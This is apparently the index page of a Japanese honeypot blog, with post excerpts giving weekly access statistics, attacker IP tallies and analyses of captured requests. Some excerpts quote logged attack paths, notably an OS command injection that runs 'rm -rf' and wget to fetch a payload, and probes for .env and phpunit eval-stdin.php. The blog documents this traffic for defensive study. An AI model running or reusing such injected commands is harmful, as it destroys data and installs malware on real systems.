ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

週刊ハニーレポート6月19日号

6月12日から6月19日のハニーポットへのアクセスレポート デイリーアクセス 2022-06-12 69 2022-06-13 81 2022-06-14 73 2022-06-15 62 2022-06-16 68 2022-06-17 64 2022-06-18 68 2022-06-19 66 ipアドレス別アクセス数 45.144.225.5 37 109.237.100.…

週刊ハニーレポート6月12日号

6月5日から6月12日のハニーポットへのアクセス状況 デイリーアクセス ステータスコード別 ipアドレス別アクセス数 HTTPリクエスト別 デイリーアクセス 2022-06-05 179 2022-06-06 144 2022-06-07 96 2022-06-08 113 2022-06-09 128 2022-06-10 110 2022…

週刊ハニーレポート6月5日号

ハニーポットへのアクセス状況。 アクセス数 ipアドレス別アクセス ステータスコード別 HTTPリクエスト別 アクセス数 2022-05-29 43 2022-05-30 277 2022-05-31 119 2022-06-01 625 2022-06-02 113 2022-06-03 110 2022-06-04 94 2022-06-05 2094 ipアドレス…

ハニーレポート5月29日号

5月22日から5月29日のハニーポットのアクセス状況をレポートします。 今週は意外にも週明けの平日にアクセスが集中しました。 首脳会談があった日ですが影響しているのでしょうか? アクセス数 2022-05-22 24 2022-05-23 456 2022-05-24 2104 2022-05-…

週刊ハニーレポート5月22日号

5月15日から5月22日までのハニーポットへのアクセスをまとめました。 アクセス数 5月20日にアクセスが急激に多くなりました。 daily access count 2022-05-15 26 2022-05-16 53 2022-05-17 103 2022-05-18 66 2022-05-19 114 2022-05-20 2078 2022-…

週刊ハニーレポート5月15日号

5月8日から5月15日のハニーポットへのアクセスレポートです。 アクセス数 連休明けのアクセスはギザギザしています。 2022-05-08 38 2022-05-09 2105 2022-05-10 89 2022-05-11 70 2022-05-12 2084 2022-05-13 84 2022-05-14 2064 2022-05-15 29 ipアド…

週刊ハニーレポート5月8日号

今週のハニーポットへのアクセス状況をお知らせします。 アクセス数 ipアドレス別アクセス数 ステータスコード別アクセス数 HTTPメソッド別カウント 参考書籍 アクセス数 今週は落ち着いたアクセス数になりました。 daily access count 2022-05-01 3 2022-05…

週刊ハニーレポート5月1日号

5月1日週のハニーポットアクセス状況はこちら! 週刊アクセス数 ipアドレス別アクセス数 URL別アクセス数 HTTPステータスコード HTTPリクエスト数 参考書籍 週刊アクセス数 4月30日ゴールデンウィークの始まりにアクセスが多いですね。乗っ取れそうなサ…

週刊ハニーレポート4月25日号

今週のハニーポットアクセス状況をレポートします。 週刊アクセス数 4月24日(日)のアクセスが2000を超えて高くなっています。また4月18日(月)も416アクセスと高くなっています。 2022-04-17 24 2022-04-18 416 2022-04-19 69 2022-04-20 77 2022-0…

週刊ハニーレポート4月17日号

4月10日〜4月17日のハニーポットアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 ステータスコード レスポンスコード 参考書籍 アクセス数 4月17日(日)のアクセスが2000を超えています。そのほかは落ち着いた1週間となりまし…

大量アクセスしてきたipアドレスを調べる#2

honey-pot-report.hatenablog.com 先週のハニーポットにきたアクセスの中で多かったipアドレスを調べます。アクセスが多かったipアドレスはこの2つです、 2022-04-08 175.107.197.123 2001 2022-04-09 31.45.240.114 2001 ※ログ集計結果を抜粋 31.45.240.11…

大量アクセスしてきたipアドレスを調べる#1

honey-pot-report.hatenablog.com 先週のレポートでアクセスが多かったipアドレスを調べます。ipアドレスは31.45.240.114です。 2001アクセスありました。このipアドレスを調べていきたいと思います。 ログ分析 ipアドレスはクロアチアから ハニーポット参考…

週刊ハニーレポート4月10日号

4月3日〜4月10日までのハニーポットへのアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 HTTPリクエストメソッド集計 HTTPステータスコード集計 アクセス数 4月8日、4月9日に2000を超えるアクセスが来ています。その他のアクセ…

週刊ハニーレポート4月3日号

3月27日から4月3日のハニーポットへのアクセスをレポートします。 週刊アクセス数 3月29日、30日、4月3日にアクセスが2000を超えています。 ipアドレスアクセス数 今週アクセスしてきたipアドレス別のアクセス数です。下記3つのipアドレス…

ホンダキーレスシステムの脆弱性についてまとめてみた

ホンダの乗用車シビックのキーレスシステムに脆弱性が発見された記事をまとめた記事になります。 脆弱性の種類 CVSS 関連CVSS 対象車 可能な悪用 攻撃方法 対策 関連記事 脆弱性の種類 キーレスシステムの脆弱性 CVSS CVE-2022-27254 Score: 未定 https://nv…

週刊ハニーレポート3月27日号

3月20日〜3月27日までのハニーポットへのアクセスレポート。 アクセス数 ipアドレス別アクセス数 HTTPリクエストメソッド HTTPステータスコード HTTP アクセスURL数 ハニーポット参考書籍 アクセス数 週刊アクセス数です。今週は100程度のアクセス…

週刊ハニーレポート3/20日号

3月15日〜3月20日のハニーポットのログのサマリーをレポートします。 デイリーアクセス HTTPアクセス HTTPステータスコード HTTPリクエスト ipアドレス別アクセス数トップ10 ハニーポット参考書籍 デイリーアクセス 3月16日、17日にアクセスが…

wgetしてくるやつを抽出するよ!

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事により…

3/3の攻撃ログ分析 xmlのメッセージの中に禁止用語が!

今日来た攻撃の中から1件取り出して分析します。 今日来たアクセスのデータは以下になります。 アクセスログデータ POST /xmlrpc.php HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: …

やってしまったぁぁぁぁ!

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・ 上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。 $ sed -i '' -e 'd' hoge.txt ログファイルが消えてった・・・・ 今月…

初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…

はるばるパナマからの大量アクセスwww

2月15日、16日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…

OSコマンドインジェクションいただきました

下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…

今週のアクセス2/3-2/13

ハニーポットを植えてから10日ほど経ちました。アクセス数を見ます。2月9日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数70程度で推移しています。この日に何が起きていたのでしょう?? 次…

クラウドサービスからのアクセス!?

今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…

正常に応答しなかったログの分析

今日はアクセスログの中で正常応答しなかったログを抽出して、1つのログをピックアップして分析します。 アクセスログの中でHTTPのレスポンスコード200以外の応答をgrepで抽出します。[1] コマンドは以下 cat access_log | grep -v 200 結果例 たくさんの正…

ハニーレポート#7 ログをbase64でデコードしてみる

アクセスログはbase64でエンコードされている部分がWOWHoneypotのアクセスログにあります。この文字列をデコードしてあげると、どんなコマンドを仕掛けているかわかります。1日数十から多い時は数百のアクセスがくるので全てにデコードして分析は非現実的で…

ハニーレポート#6 脆弱性を狙った攻撃を検知

ハニーポットを再構築して3日ほど経ちました。アクセスが早速きているのでログを見てみます。まだ、集計用のスクリプトなど作っていないので今日は不審なHTMLタグ挿入があるか抽出してみます。 ログ抽出用のコマンドはこちら[1] grep -E "<[^>]+>[^<]+<[^>]…

WOWHoneypot構築手順

ハニーポットを作成しましたが設定などメール送信したり、分析用コードを作成のためにpythonライブラリを色々入れたりしてました。これだと再構築したりするときに同じ手順を踏んで構築ができないので作り直して作成方法を記録することにしました。 環境 さ…